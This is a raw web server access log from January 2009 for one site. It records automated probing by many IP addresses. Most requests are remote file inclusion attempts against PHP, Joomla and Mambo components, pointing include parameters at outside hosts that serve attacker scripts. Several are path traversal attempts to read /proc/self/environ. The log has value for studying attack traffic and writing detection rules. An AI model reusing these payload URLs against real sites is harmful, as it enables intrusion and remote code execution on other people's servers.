89.111.180.85 - - [06/Jan/2009:08:34:10 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:34:10 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [06/Jan/2009:08:34:10 -0800] "GET /logs/access_080831.log/?sourcedir=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:11 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:34:11 -0800] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:11 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:34:11 -0800] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:34:11 -0800] "GET /logs/access_081009.log/index.php?canal=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:11 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:12 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:12 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:34:13 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:13 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:34:13 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:13 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:34:13 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:14 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:34:14 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:34:14 -0800] "GET /?path%5Bdocroot%5D=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 200 94761 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:14 -0800] "GET /logs/access_080509.log%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:34:14 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:15 -0800] "GET /logs/access_080509.log%20%20//index2.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:15 -0800] "GET /logs/access_080509.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:16 -0800] "GET /logs/access_080509.log%20%20//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:34:16 -0800] "GET /logs//?path%5Bdocroot%5D=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 200 81177 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:16 -0800] "GET /logs/access_080509.log%20%20//modules/calendar/mod_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:17 -0800] "GET /logs/access_080509.log%20%20//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:17 -0800] "GET /logs/access_080509.log%20%20//modules/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:17 -0800] "GET /logs/access_080509.log%20%20//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:18 -0800] "GET /logs/access_080509.log%20%20//modules/mod_calendar.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:18 -0800] "GET /logs/access_080509.log%20%20//modules/mod_header_image.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:19 -0800] "GET /logs/access_080509.log%20%20//modules/mod_mainmenu.php?mosConfig_absolute_path=%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:19 -0800] "GET /logs/access_080509.log%20%20//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:20 -0800] "GET /logs/access_080509.log%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.89.25.196 - - [06/Jan/2009:08:34:20 -0800] "GET /logs/access_080613.log/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.89.25.196 - - [06/Jan/2009:08:34:20 -0800] "GET /logs/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.89.25.196 - - [06/Jan/2009:08:34:20 -0800] "GET /errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.111.180.85 - - [06/Jan/2009:08:34:20 -0800] "GET /logs/access_080509.log%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.1.215.164 - - [06/Jan/2009:08:34:22 -0800] "GET /logs/access_081109.log HTTP/1.0" 200 458752 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:34:26 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:34:26 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:34:26 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:34:27 -0800] "GET /logs/access_080226.log/services.php?page=http://www.great21.co.kr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.196 - - [06/Jan/2009:08:34:40 -0800] "GET /logs/access_081205.log/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:34:46 -0800] "GET /logs/access_080309.log/index.php?option=com_joomlapack&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:34:47 -0800] "GET /index.php?option=com_joomlapack&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:34:47 -0800] "GET /logs/index.php?option=com_joomlapack&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.196 - - [06/Jan/2009:08:34:51 -0800] "GET /logs/access_081106.log/errors.php?error=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
194.149.234.21 - - [06/Jan/2009:08:34:52 -0800] "GET /logs/access_081017.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:34:54 -0800] "GET /logs/access_081102.log/skin/zero_vote/error.php?dir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:34:59 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:35:10 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.149.234.21 - - [06/Jan/2009:08:35:16 -0800] "GET /logs/access_081015.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.65.125 - - [06/Jan/2009:08:35:18 -0800] "GET /logs/access_081120.log////?_PHPLIB[libdir]=http://www.vampirewear.com/11.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.65.125 - - [06/Jan/2009:08:35:19 -0800] "GET /logs////?_PHPLIB[libdir]=http://www.vampirewear.com/11.gif??? HTTP/1.1" 200 81179 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:35:24 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:35:29 -0800] "GET /logs/access_080509.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:35:29 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:35:30 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 200 95139 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [06/Jan/2009:08:36:04 -0800] "GET /logs/access_081009.log/index.php?canal=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
203.191.149.3 - - [06/Jan/2009:08:36:05 -0800] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.ptps.cyc.edu.tw/count_data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:06 -0800] "GET /logs/access_080811.log/popup.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:06 -0800] "GET /logs/popup.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:06 -0800] "GET /popup.php?path=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:07 -0800] "GET /logs/access_080811.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:07 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:07 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:07 -0800] "GET /logs/access_080811.log/popup.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:07 -0800] "GET /popup.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:07 -0800] "GET /logs/popup.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:08 -0800] "GET /logs/access_080811.log/popup.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:08 -0800] "GET /logs/popup.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
124.42.90.137 - - [06/Jan/2009:08:36:08 -0800] "GET /popup.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:36:13 -0800] "GET /logs/access_080430.log%20%20//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:36:24 -0800] "GET /logs/access_080304.log%20%20//?path%5Bdocroot%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:36:33 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.18.200 - - [06/Jan/2009:08:36:35 -0800] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/kilitos2008/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [06/Jan/2009:08:36:48 -0800] "GET /?sourcedir=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 200 94749 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:36:48 -0800] "GET /logs/access_080216.log/index.php?option=com_joomlapack&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:39 -0800] "GET /logs/access_080524.log/index.php?option=com_sitemap&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:40 -0800] "GET /logs/access_080315.log/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:40 -0800] "GET /index.php?option=com_sitemap&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95155 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:41 -0800] "GET /index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:41 -0800] "GET /logs/index.php?option=com_sitemap&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:41 -0800] "GET /logs/index.php?option=com_maxcomment&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:37:43 -0800] "GET /logs/access_080522.log/index.php?option=com_sitemap&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.222.40.42 - - [06/Jan/2009:08:37:47 -0800] "GET /logs/?sourcedir=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 200 81172 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.42 - - [06/Jan/2009:08:37:49 -0800] "GET /?sourcedir=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 200 94749 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:37:53 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:08:38:28 -0800] "GET /errors.php?error=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:08:38:29 -0800] "GET /logs/errors.php?error=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:36 -0800] "GET /config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:36 -0800] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:37 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:37 -0800] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:39 -0800] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:39 -0800] "GET /config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:39 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:08:38:39 -0800] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:38:49 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:38:59 -0800] "GET /logs/access_080530.log//contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.232.203.242 - - [06/Jan/2009:08:39:02 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:25 -0800] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:25 -0800] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:26 -0800] "GET /logs/access_080611.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:30 -0800] "GET /logs/access_080610.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:31 -0800] "GET /logs/access_080610.log/components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:08:39:31 -0800] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
